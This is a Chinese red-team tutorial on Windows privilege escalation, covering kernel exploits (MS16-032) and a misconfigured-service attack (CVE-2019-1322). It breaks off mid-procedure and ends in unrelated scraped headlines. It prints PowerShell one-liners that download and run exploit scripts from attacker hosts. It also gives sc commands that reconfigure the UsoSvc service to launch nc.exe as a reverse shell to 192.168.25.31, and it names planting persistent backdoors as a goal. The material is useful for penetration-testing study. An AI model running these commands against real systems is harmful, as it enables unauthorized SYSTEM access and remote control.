红队测试之Windows提权小结
本节主要针对Windows操作系统下的权限提升进行介绍 , 提权是后渗透重要的一环节 , 在权限较低的情况下 , 站在攻击者的视角进行内部网络安全测试、系统安全测试、应用安全测试等方面会出现“束缚” , 所测试出的质量与结果也会不同 。 本文基于Win操作系统下分别从内核漏洞、权限配置、DLL注入、注册表等方面展开介绍 , 其中包含漏洞本身的介绍、漏洞复现过程等内容的展现 。 该提权内容的阅读没有前后顺序 , 可根据读者自身所需进行全文阅读或某方向内容的阅读 。
提权背景权限提升意味着用户获得不允许他使用的权限 。 比如从一个普通用户 , 通过“手段”让自己变为管理员用户 , 也可以理解为利用操作系统或软件应用程序中的错误 , 设计缺陷或配置错误来获得对更高访问权限的行为 。
为什么我们需要提权读取/写入敏感文件
重新启动之后权限维持
插入永久后门
Windows提权的常见方法【红队测试之Windows提权小结】1.内核漏洞
2.错误的服务权限配置
3.DLL注入
4.始终以高权限安装程序
5.凭证存储
内核漏洞漏洞介绍内核漏洞利用程序是利用内核漏洞来执行具有更高权限的任意代码的程序 。 成功的内核利用通常会以root命令提示符的形式为攻击者提供对目标系统的超级用户访问权限 。
漏洞复现接下来我们以MS16-032来做演示 ,
给大家介绍下检查Windows提权辅助工具 , wesng主要帮助检测Windows安全缺陷 , 是WindowsExploitSuggesters的升级版 , 通过读取加载systeminfo命令的结果来输出漏洞利用建议 。
https://github.com/bitsadmin/wesng.git1.将wesng下载到本地主机上 , 先升级最新的漏洞数据库 。
pythonwes.py—update
文章图片
2.将目标机器的systeminfo命令的结果输出并保存 , 使用wesng进行检查 。 
文章图片
发现只安装3个补丁 , 可以查看输出结果来找对应的漏洞利用代码 。 
文章图片
3.下载https://www.exploit-db.com/exploits/39719里面的漏洞利用
使用powershell下载漏洞利用代码并执行
PowershellIEX(New-ObjectNet.WebClient).DownloadString('http://X.X.X.X:8000/ms16-032.ps1');Invoke-MS16-032
文章图片
错误的服务权限配置漏洞介绍MicrosoftWindows服务(即以前的NT服务)能够创建可长时间运行的可执行应用程序 。 这些服务可以在计算机启动时自动启动 , 可以暂停和重新启动而且不显示任何用户界面 。 这种服务非常适合在服务器上使用 , 或任何时候 , 为了不影响在同一台计算机上工作的其他用户 , 需要长时间运行功能时使用 。 还可以在不同登录用户的特定用户帐户或默认计算机帐户的安全上下文中运行服务 。 Windows服务(WindowsServices)通常使用本地系统账户启动 。 如果我们拥有可以修改服务配置权限的话 , 可以将服务启动的二进制文件替换成恶意的二进制文件 , 重新启动服务后执行恶意的二进制文件 , 可以获取到system权限 。
漏洞复现1.首先需要在找到存在配置权限错误的服务 , 这里推荐大家使用powerup.ps1 ,
https://github.com/PowerShellMafia/PowerSploit/tree/master/Privescpowerup是一个非常好用的windows提权辅助脚本 , 可以检查各种服务滥用 , dll劫持 , 启动项等 , 来枚举系统上常见的提权方式 。
接下来我们以CVE-2019-1322进行演示 , UpdateOrchestrator服务的运行方式为NTAUTHORITYSYSTEM , 并且在Windows10和WindowsServer2019上已默认启用 。 首先使用powershell加载powerup.ps1 , 需要在powerup.ps1结尾中加入InvokeAllchecks或者使用powershell执行时加载 , 执行如下代码:
Powershell-execbypassIEX(new-objectNet.webclient).downloadstring('http://192.168.25.31:8000/PowerUp.ps1');InvokeAllchecks发现USOSVC可以被修改和重启 。 
文章图片
2.接下来我们上传nc , 此处可以换成cs或msf生成的任意可执行文件 , 此处有一个小坑 , binPath=和路径中间有一个空格 , 修改服务启动的可执行程序后 , 启动服务 。
1)停止USOSVC服务
PSC:Windowssystem32>scstopUsoSvc2)将服务执行的exe文件修改为nc , 反弹shell
PSC:Windowssystem32>scconfigusosvcbinPath="C:GitStackgitphpnc.exe192.168.25.314455-ecmd.exe"3)将服务状态设置为自动启动
- 马斯克:全自动驾驶测试版需求量高 将推出下载测试版快速入口
- 红魔6Pro高刷游戏及性能实测:王者吃鸡原神全程高能
- 特斯拉CEO埃隆·马斯克:将在大约10天内将“下载测试版”按钮添加到汽车显示屏服务功能上
- 迷你世界五周年庆猜测!会不会是保护麋鹿?还是保护历史文化?
- ITBD-TWS耳机全球市场数据监测
- 【运势预测】2021年3月7日
- 心理测试:选出你不敢走的拱桥,测出你有什么好运连续不断的奔来
- 心理测试:你最喜欢哪双水晶鞋?测你的白马王子什么时候出现
- 全自动驾驶,续航超600km!大众电动巴士ID. BUZZ测试中!
- 无线投影仪CE认证,无线投影仪EMC测试,传到测试,辐射测试